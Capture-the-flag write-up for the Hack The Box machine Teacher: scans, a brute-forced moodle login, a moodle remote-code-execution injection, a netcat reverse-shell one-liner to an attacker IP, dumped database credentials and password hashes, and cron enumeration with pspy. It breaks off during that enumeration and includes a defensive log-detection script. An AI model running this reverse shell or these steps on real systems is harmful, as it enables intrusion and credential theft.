Introduction
I am a Hack The Box beginner. If you have any corrections, additions or advice, please leave a comment or contact me on Twitter. さんぽし(@sanpo_shiho) | Twitter
cheat sheet
I keep notes on tool usage and similar things as a cheat sheet at the link below; feel free to refer to it. github | sanposhiho/MYCHEATSHEET
About the machine
The difficulty is Easy.
It is the second-highest-rated machine among the Easy machines.
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 05:36 EDT
Nmap scan report for 10.10.10.153
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds
Let's look at port 80 in a browser.
gobuster
kali@kali:~$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -u http://10.10.10.153
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.153
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/29 05:17:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 403)
/moodle (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/29 05:31:37 Finished
===============================================================
Exploring the website thoroughly
Looking at the source of /gallery.html, one part stands out: some unexplained code is attached to images/5.png. Opening /images/5.png shows nothing, so let's fetch it with curl.
$ curl http://10.10.10.153/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
I see... so “That's an F” was the answer to this message.
Logging in at /moodle
Let's log in with the information we found. However, trying giovanni/Th4C00lTheachaF does not get us in. Come on...
Brute-forcing it
Since the last character may not actually be F, let's brute-force it.
The wordlist used is /usr/share/wordlists/dirb/stress/alphanum_case_extra.txt.
Burp's Intruder is run with the following settings.
Then:
As shown, Th4C00lTheacha# succeeds.
Using Th4C00lTheacha# as the password, the login succeeds (so what was “That's an F” about, after all...).
Remote Code Execution in moodle
Some versions of moodle have a Remote Code Execution vulnerability.
https://blog.ripstech.com/2018/moodle-remote-code-execution/ I followed the video introduced on this site (it is a bit tedious to explain here, so please check the site yourself).
↑ Appending &0=ping 10.10.14.13 to the URL to test whether the ping gets through.
kali@kali:~$ sudo tcpdump -i tun0
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
03:22:55.665518 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [S], seq 3529097773, win 64240, options [mss 1460,sackOK,TS val 89662984 ecr 0,nop,wscale 7], length 0
03:22:55.837589 IP 10.10.10.153.http > 10.10.14.13.52754: Flags [S.], seq 2770244404, ack 3529097774, win 28960, options [mss 1357,sackOK,TS val 416124 ecr 89662984,nop,wscale 7], length 0
03:22:55.837642 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 89663156 ecr 416124], length 0
03:22:55.838152 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [P.], seq 1:550, ack 1, win 502, options [nop,nop,TS val 89663157 ecr 416124], length 549: HTTP: GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=ping%2010.10.14.13 HTTP/1.1
03:22:56.010796 IP 10.10.10.153.http > 10.10.14.13.52754: Flags [.], ack 550, win 235, options [nop,nop,TS val 416167 ecr 89663157], length 0
03:22:56.047524 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 1, length 64
03:22:56.047559 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 1, length 64
03:22:57.049785 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 2, length 64
03:22:57.049810 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 2, length 64
03:22:58.157466 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 3, length 64
03:22:58.157645 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 3, length 64
03:22:59.111049 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 4, length 64
03:22:59.111081 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 4, length 64
03:23:00.103073 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 5, length 64
03:23:00.103102 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 5, length 64
03:23:01.129041 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 6, length 64
03:23:01.129076 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 6, length 64
03:23:02.152756 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 7, length 64
03:23:02.152782 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 7, length 64
03:23:03.058237 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 8, length 64
03:23:03.058274 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 8, length 64
It got through.
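As an added example from the defender's side (not part of the original write-up): a small shell function that flags access-log lines with the request shape visible in the capture above, a datasetitems wizard request to question.php carrying a bare numeric parameter key. The sample log lines are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag access-log lines that
# look like the moodle question.php request seen in the tcpdump above, i.e.
# the datasetitems wizard page called with a numeric-keyed parameter such as
# "&0=ping%2010.10.14.13". Ordinary requests to that page carry named
# parameters only, so a bare digit key is the thing worth alerting on.

# Constructed sample lines in Apache combined-log style. Lines 2 and 4
# carry a numeric key on a datasetitems request; lines 1 and 3 do not.
SAMPLE_LOG='10.10.14.13 - - [11/Apr/2020:03:22:50 -0400] "GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7&id=6&wizardnow=datasetitems&cmid=7 HTTP/1.1" 200 5120
10.10.14.13 - - [11/Apr/2020:03:22:55 -0400] "GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=ping%2010.10.14.13 HTTP/1.1" 200 5120
10.10.14.13 - - [11/Apr/2020:03:23:10 -0400] "GET /moodle/mod/quiz/edit.php?cmid=7&0=x HTTP/1.1" 200 3100
10.10.14.13 - - [11/Apr/2020:03:24:01 -0400] "GET /moodle/question/question.php?id=6&wizardnow=datasetitems&cmid=7&1=id HTTP/1.1" 200 5120'

# Reads log lines on stdin and prints the suspicious ones: a question.php
# request on the datasetitems wizard step that also has a numeric key.
flag_moodle_datasetitems_numeric_param() {
  grep -E 'question\.php\?[^" ]*wizardnow=datasetitems' \
    | grep -E '[?&][0-9]+='
}

# Extracts the value of the last numeric-keyed parameter from one flagged
# line and decodes the common URL escapes, so an analyst sees the literal
# "ping 10.10.14.13" instead of "ping%2010.10.14.13".
decode_numeric_param() {
  printf '%s\n' "$1" \
    | sed -E 's/.*[?&][0-9]+=([^& "]*).*/\1/' \
    | sed -e 's/%20/ /g' -e 's|%2[Ff]|/|g' -e 's/%3[Bb]/;/g' \
          -e 's/%7[Cc]/|/g' -e 's/%26/\&/g'
}

# Stand-alone run: print each flagged line's decoded parameter value.
printf '%s\n' "$SAMPLE_LOG" | flag_moodle_datasetitems_numeric_param \
  | while IFS= read -r line; do
      printf 'suspicious numeric parameter: %s\n' "$(decode_numeric_param "$line")"
    done
```

On a real server, pipe the Apache access log into flag_moodle_datasetitems_numeric_param and treat any hit as a signal to check the moodle version against the RIPS advisory linked above.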
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4242 >/tmp/f
is the reverse-shell one-liner used (URL-encode it, then append it after 0= and it works).
kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.153] 58168
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$
Looking into mysql
config.php contains the DB credentials, so let's use them to look into mysql.
www-data@teacher:/var/www/html/moodle$ cat config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle';
$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
www-data@teacher:/var/www/html/moodle/question$ mysql -u root -p
mysql -u root -p
Enter password: Welkom1!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show database
show database
-> ;
;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moodle |
| mysql |
| performance_schema |
| phpmyadmin |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]> show tables
show tables
-> ;
;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> shoe tables;
shoe tables;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'shoe tables' at line 1
MariaDB [(none)]> show tables;
show tables;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use moodle
use moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [moodle]> show tables;
show tables;
+----------------------------------+
| Tables_in_moodle |
+----------------------------------+
| mdl_analytics_indicator_calc |
| mdl_analytics_models |
| mdl_analytics_models_log |
| mdl_analytics_predict_samples |
| mdl_analytics_prediction_actions |
| mdl_analytics_predictions |
| mdl_analytics_train_samples |
| mdl_analytics_used_analysables |
| mdl_analytics_used_files |
| mdl_assign |
| mdl_assign_grades |
| mdl_assign_overrides |
| mdl_assign_plugin_config |
| mdl_assign_submission |
| mdl_assign_user_flags |
| mdl_assign_user_mapping |
| mdl_assignfeedback_comments |
| mdl_assignfeedback_editpdf_annot |
| mdl_assignfeedback_editpdf_cmnt |
| mdl_assignfeedback_editpdf_queue |
| mdl_assignfeedback_editpdf_quick |
| mdl_assignfeedback_file |
| mdl_assignment |
| mdl_assignment_submissions |
| mdl_assignment_upgrade |
| mdl_assignsubmission_file |
| mdl_assignsubmission_onlinetext |
| mdl_auth_oauth2_linked_login |
| mdl_backup_controllers |
| mdl_backup_courses |
| mdl_backup_logs |
| mdl_badge |
| mdl_badge_backpack |
| mdl_badge_criteria |
| mdl_badge_criteria_met |
| mdl_badge_criteria_param |
| mdl_badge_external |
| mdl_badge_issued |
| mdl_badge_manual_award |
| mdl_block |
| mdl_block_community |
| mdl_block_instances |
| mdl_block_positions |
| mdl_block_recent_activity |
| mdl_block_rss_client |
| mdl_blog_association |
| mdl_blog_external |
| mdl_book |
| mdl_book_chapters |
| mdl_cache_filters |
| mdl_cache_flags |
| mdl_capabilities |
| mdl_chat |
| mdl_chat_messages |
| mdl_chat_messages_current |
| mdl_chat_users |
| mdl_choice |
| mdl_choice_answers |
| mdl_choice_options |
| mdl_cohort |
| mdl_cohort_members |
| mdl_comments |
| mdl_competency |
| mdl_competency_coursecomp |
| mdl_competency_coursecompsetting |
| mdl_competency_evidence |
| mdl_competency_framework |
| mdl_competency_modulecomp |
| mdl_competency_plan |
| mdl_competency_plancomp |
| mdl_competency_relatedcomp |
| mdl_competency_template |
| mdl_competency_templatecohort |
| mdl_competency_templatecomp |
| mdl_competency_usercomp |
| mdl_competency_usercompcourse |
| mdl_competency_usercompplan |
| mdl_competency_userevidence |
| mdl_competency_userevidencecomp |
| mdl_config |
| mdl_config_log |
| mdl_config_plugins |
| mdl_context |
| mdl_context_temp |
| mdl_course |
| mdl_course_categories |
| mdl_course_completion_aggr_methd |
| mdl_course_completion_crit_compl |
| mdl_course_completion_criteria |
| mdl_course_completion_defaults |
| mdl_course_completions |
| mdl_course_format_options |
| mdl_course_modules |
| mdl_course_modules_completion |
| mdl_course_published |
| mdl_course_request |
| mdl_course_sections |
| mdl_data |
| mdl_data_content |
| mdl_data_fields |
| mdl_data_records |
| mdl_editor_atto_autosave |
| mdl_enrol |
| mdl_enrol_flatfile |
| mdl_enrol_lti_lti2_consumer |
| mdl_enrol_lti_lti2_context |
| mdl_enrol_lti_lti2_nonce |
| mdl_enrol_lti_lti2_resource_link |
| mdl_enrol_lti_lti2_share_key |
| mdl_enrol_lti_lti2_tool_proxy |
| mdl_enrol_lti_lti2_user_result |
| mdl_enrol_lti_tool_consumer_map |
| mdl_enrol_lti_tools |
| mdl_enrol_lti_users |
| mdl_enrol_paypal |
| mdl_event |
| mdl_event_subscriptions |
| mdl_events_handlers |
| mdl_events_queue |
| mdl_events_queue_handlers |
| mdl_external_functions |
| mdl_external_services |
| mdl_external_services_functions |
| mdl_external_services_users |
| mdl_external_tokens |
| mdl_feedback |
| mdl_feedback_completed |
| mdl_feedback_completedtmp |
| mdl_feedback_item |
| mdl_feedback_sitecourse_map |
| mdl_feedback_template |
| mdl_feedback_value |
| mdl_feedback_valuetmp |
| mdl_file_conversion |
| mdl_files |
| mdl_files_reference |
| mdl_filter_active |
| mdl_filter_config |
| mdl_folder |
| mdl_forum |
| mdl_forum_digests |
| mdl_forum_discussion_subs |
| mdl_forum_discussions |
| mdl_forum_posts |
| mdl_forum_queue |
| mdl_forum_read |
| mdl_forum_subscriptions |
| mdl_forum_track_prefs |
| mdl_glossary |
| mdl_glossary_alias |
| mdl_glossary_categories |
| mdl_glossary_entries |
| mdl_glossary_entries_categories |
| mdl_glossary_formats |
| mdl_grade_categories |
| mdl_grade_categories_history |
| mdl_grade_grades |
| mdl_grade_grades_history |
| mdl_grade_import_newitem |
| mdl_grade_import_values |
| mdl_grade_items |
| mdl_grade_items_history |
| mdl_grade_letters |
| mdl_grade_outcomes |
| mdl_grade_outcomes_courses |
| mdl_grade_outcomes_history |
| mdl_grade_settings |
| mdl_grading_areas |
| mdl_grading_definitions |
| mdl_grading_instances |
| mdl_gradingform_guide_comments |
| mdl_gradingform_guide_criteria |
| mdl_gradingform_guide_fillings |
| mdl_gradingform_rubric_criteria |
| mdl_gradingform_rubric_fillings |
| mdl_gradingform_rubric_levels |
| mdl_groupings |
| mdl_groupings_groups |
| mdl_groups |
| mdl_groups_members |
| mdl_imscp |
| mdl_label |
| mdl_lesson |
| mdl_lesson_answers |
| mdl_lesson_attempts |
| mdl_lesson_branch |
| mdl_lesson_grades |
| mdl_lesson_overrides |
| mdl_lesson_pages |
| mdl_lesson_timer |
| mdl_license |
| mdl_lock_db |
| mdl_log |
| mdl_log_display |
| mdl_log_queries |
| mdl_logstore_standard_log |
| mdl_lti |
| mdl_lti_submission |
| mdl_lti_tool_proxies |
| mdl_lti_tool_settings |
| mdl_lti_types |
| mdl_lti_types_config |
| mdl_message |
| mdl_message_airnotifier_devices |
| mdl_message_contacts |
| mdl_message_popup |
| mdl_message_processors |
| mdl_message_providers |
| mdl_message_read |
| mdl_message_working |
| mdl_messageinbound_datakeys |
| mdl_messageinbound_handlers |
| mdl_messageinbound_messagelist |
| mdl_mnet_application |
| mdl_mnet_host |
| mdl_mnet_host2service |
| mdl_mnet_log |
| mdl_mnet_remote_rpc |
| mdl_mnet_remote_service2rpc |
| mdl_mnet_rpc |
| mdl_mnet_service |
| mdl_mnet_service2rpc |
| mdl_mnet_session |
| mdl_mnet_sso_access_control |
| mdl_mnetservice_enrol_courses |
| mdl_mnetservice_enrol_enrolments |
| mdl_modules |
| mdl_my_pages |
| mdl_oauth2_endpoint |
| mdl_oauth2_issuer |
| mdl_oauth2_system_account |
| mdl_oauth2_user_field_mapping |
| mdl_page |
| mdl_portfolio_instance |
| mdl_portfolio_instance_config |
| mdl_portfolio_instance_user |
| mdl_portfolio_log |
| mdl_portfolio_mahara_queue |
| mdl_portfolio_tempdata |
| mdl_post |
| mdl_profiling |
| mdl_qtype_ddimageortext |
| mdl_qtype_ddimageortext_drags |
| mdl_qtype_ddimageortext_drops |
| mdl_qtype_ddmarker |
| mdl_qtype_ddmarker_drags |
| mdl_qtype_ddmarker_drops |
| mdl_qtype_essay_options |
| mdl_qtype_match_options |
| mdl_qtype_match_subquestions |
| mdl_qtype_multichoice_options |
| mdl_qtype_randomsamatch_options |
| mdl_qtype_shortanswer_options |
| mdl_question |
| mdl_question_answers |
| mdl_question_attempt_step_data |
| mdl_question_attempt_steps |
| mdl_question_attempts |
| mdl_question_calculated |
| mdl_question_calculated_options |
| mdl_question_categories |
| mdl_question_dataset_definitions |
| mdl_question_dataset_items |
| mdl_question_datasets |
| mdl_question_ddwtos |
| mdl_question_gapselect |
| mdl_question_hints |
| mdl_question_multianswer |
| mdl_question_numerical |
| mdl_question_numerical_options |
| mdl_question_numerical_units |
| mdl_question_response_analysis |
| mdl_question_response_count |
| mdl_question_statistics |
| mdl_question_truefalse |
| mdl_question_usages |
| mdl_quiz |
| mdl_quiz_attempts |
| mdl_quiz_feedback |
| mdl_quiz_grades |
| mdl_quiz_overrides |
| mdl_quiz_overview_regrades |
| mdl_quiz_reports |
| mdl_quiz_sections |
| mdl_quiz_slots |
| mdl_quiz_statistics |
| mdl_rating |
| mdl_registration_hubs |
| mdl_repository |
| mdl_repository_instance_config |
| mdl_repository_instances |
| mdl_repository_onedrive_access |
| mdl_resource |
| mdl_resource_old |
| mdl_role |
| mdl_role_allow_assign |
| mdl_role_allow_override |
| mdl_role_allow_switch |
| mdl_role_assignments |
| mdl_role_capabilities |
| mdl_role_context_levels |
| mdl_role_names |
| mdl_role_sortorder |
| mdl_scale |
| mdl_scale_history |
| mdl_scorm |
| mdl_scorm_aicc_session |
| mdl_scorm_scoes |
| mdl_scorm_scoes_data |
| mdl_scorm_scoes_track |
| mdl_scorm_seq_mapinfo |
| mdl_scorm_seq_objective |
| mdl_scorm_seq_rolluprule |
| mdl_scorm_seq_rolluprulecond |
| mdl_scorm_seq_rulecond |
| mdl_scorm_seq_ruleconds |
| mdl_search_index_requests |
| mdl_sessions |
| mdl_stats_daily |
| mdl_stats_monthly |
| mdl_stats_user_daily |
| mdl_stats_user_monthly |
| mdl_stats_user_weekly |
| mdl_stats_weekly |
| mdl_survey |
| mdl_survey_analysis |
| mdl_survey_answers |
| mdl_survey_questions |
| mdl_tag |
| mdl_tag_area |
| mdl_tag_coll |
| mdl_tag_correlation |
| mdl_tag_instance |
| mdl_task_adhoc |
| mdl_task_scheduled |
| mdl_tool_cohortroles |
| mdl_tool_customlang |
| mdl_tool_customlang_components |
| mdl_tool_monitor_events |
| mdl_tool_monitor_history |
| mdl_tool_monitor_rules |
| mdl_tool_monitor_subscriptions |
| mdl_tool_recyclebin_category |
| mdl_tool_recyclebin_course |
| mdl_tool_usertours_steps |
| mdl_tool_usertours_tours |
| mdl_upgrade_log |
| mdl_url |
| mdl_user |
| mdl_user_devices |
| mdl_user_enrolments |
| mdl_user_info_category |
| mdl_user_info_data |
| mdl_user_info_field |
| mdl_user_lastaccess |
| mdl_user_password_history |
| mdl_user_password_resets |
| mdl_user_preferences |
| mdl_user_private_key |
| mdl_wiki |
| mdl_wiki_links |
| mdl_wiki_locks |
| mdl_wiki_pages |
| mdl_wiki_subwikis |
| mdl_wiki_synonyms |
| mdl_wiki_versions |
| mdl_workshop |
| mdl_workshop_aggregations |
| mdl_workshop_assessments |
| mdl_workshop_assessments_old |
| mdl_workshop_comments_old |
| mdl_workshop_elements_old |
| mdl_workshop_grades |
| mdl_workshop_grades_old |
| mdl_workshop_old |
| mdl_workshop_rubrics_old |
| mdl_workshop_stockcomments_old |
| mdl_workshop_submissions |
| mdl_workshop_submissions_old |
| mdl_workshopallocation_scheduled |
| mdl_workshopeval_best_settings |
| mdl_workshopform_accumulative |
| mdl_workshopform_comments |
| mdl_workshopform_numerrors |
| mdl_workshopform_numerrors_map |
| mdl_workshopform_rubric |
| mdl_workshopform_rubric_config |
| mdl_workshopform_rubric_levels |
+----------------------------------+
388 rows in set (0.00 sec)
MariaDB [moodle]> select * from mdl_user
select * from mdl_user
-> ;
;
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| id | auth | confirmed | policyagreed | deleted | suspended | mnethostid | username | password | idnumber | firstname | lastname | email | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin | currentlogin | lastip | secret | picture | url | description | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| 1 | manual | 1 | 0 | 0 | 0 | 1 | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | | Guest user | | root@localhost | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | This user is a special user that allows read-only access to some courses. | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 1530058999 | 0 | NULL | NULL | NULL | NULL | NULL |
| 2 | manual | 1 | 0 | 0 | 0 | 1 | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | | Admin | User | [email protected] | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1530059097 | 1530059573 | 1530059097 | 1530059307 | 192.168.206.1 | | 0 | | | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1530059135 | 0 | NULL | | | | |
| 3 | manual | 1 | 0 | 0 | 0 | 1 | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | | Giovanni | Chhatta | [email protected] | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 1530059681 | 1586592855 | 1530069132 | 1586592777 | 10.10.14.13 | | 0 | | | 1 | 1 | 0 | 2 | 1 | 0 | 1530059291 | 1530059291 | 0 | | | | | |
| 1337 | manual | 0 | 0 | 0 | 0 | 0 | Giovannibak | 7a860966115182402ed06375cf0a22af | | | | | 0 | | | | | | | | | | | | | en | gregorian | | 99 | 0 | 0 | 0 | 0 | | | 0 | | NULL | 1 | 1 | 0 | 2 | 1 | 0 | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
4 rows in set (0.00 sec)
MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
MariaDB [moodle]> \q
\q
Bye
Looking up the recovered password and escalating to giovanni
I look it up on the following site: https://crackstation.net/
The result is expelled; use it to switch to giovanni.
www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle/question$ cd /
cd /
giovanni@teacher:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
giovanni@teacher:/$ cd home
cd home
giovanni@teacher:/home$ ls
ls
giovanni
giovanni@teacher:/home$ cd giovanni
cd giovanni
giovanni@teacher:~$ ls
ls
user.txt work
giovanni@teacher:~$ cat user.txt
user.txt obtained.
Looking around inside ~/giovanni
giovanni@teacher:~$ ls
ls
user.txt work
giovanni@teacher:~$ cd work
cd work
giovanni@teacher:~/work$ find .
find .
.
./tmp
./tmp/courses
./tmp/courses/algebra
./tmp/courses/algebra/answersAlgebra
./tmp/backup_courses.tar.gz
./courses
./courses/algebra
./courses/algebra/answersAlgebra
This is where I got completely stuck.
I often see the reasoning "there is a single root-owned file whose timestamp keeps changing, so there must be a cronjob that creates or updates it", but I have never once managed to notice on my own that one file's timestamp keeps changing
— さんぽし (@sanpo_shiho) April 11, 2020
That was exactly it.
giovanni@teacher:~/work$ ls -lR
ls -lR
.:
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp
./courses:
total 4
drwxr-xr-x 2 root root 4096 Jun 27 2018 algebra
./courses/algebra:
total 4
-rw-r--r-- 1 giovanni giovanni 109 Jun 27 2018 answersAlgebra
./tmp:
total 8
-rwxrwxrwx 1 root root 256 Apr 11 10:25 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Jun 27 2018 courses
./tmp/courses:
total 4
drwxrwxrwx 2 root root 4096 Jun 27 2018 algebra
./tmp/courses/algebra:
total 4
-rwxrwxrwx 1 giovanni giovanni 109 Jun 27 2018 answersAlgebra
I should have noticed the timestamp on the root-owned backup_courses.tar.gz...
Using pspy
In cases like this, some cronjob is usually updating backup_courses.tar.gz over and over, so let's use pspy to find that cronjob.
giovanni@teacher:~/work$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/04/11 10:45:54 CMD: UID=1000 PID=958 | bash
2020/04/11 10:45:54 CMD: UID=1000 PID=956 | (sd-pam)
2020/04/11 10:45:54 CMD: UID=1000 PID=955 | /lib/systemd/systemd --user
2020/04/11 10:45:54 CMD: UID=33 PID=954 | su giovanni
2020/04/11 10:45:54 CMD: UID=33 PID=903 | /bin/bash
2020/04/11 10:45:54 CMD: UID=33 PID=902 | python -c import pty;pty.spawn("/bin/bash")
2020/04/11 10:45:54 CMD: UID=0 PID=9 |
2020/04/11 10:45:54 CMD: UID=33 PID=892 | nc 10.10.14.13 4242
2020/04/11 10:45:54 CMD: UID=33 PID=891 | /bin/sh -i
2020/04/11 10:45:54 CMD: UID=33 PID=890 | cat /tmp/f
2020/04/11 10:45:54 CMD: UID=33 PID=887 | sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4242 >/tmp/f
2020/04/11 10:45:54 CMD: UID=0 PID=87 |
2020/04/11 10:45:54 CMD: UID=0 PID=86 |
2020/04/11 10:45:54 CMD: UID=33 PID=853 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=852 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=851 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=850 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0 PID=85 |
2020/04/11 10:45:54 CMD: UID=33 PID=848 | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33 PID=845 | /usr/sbin/apache2 -k start
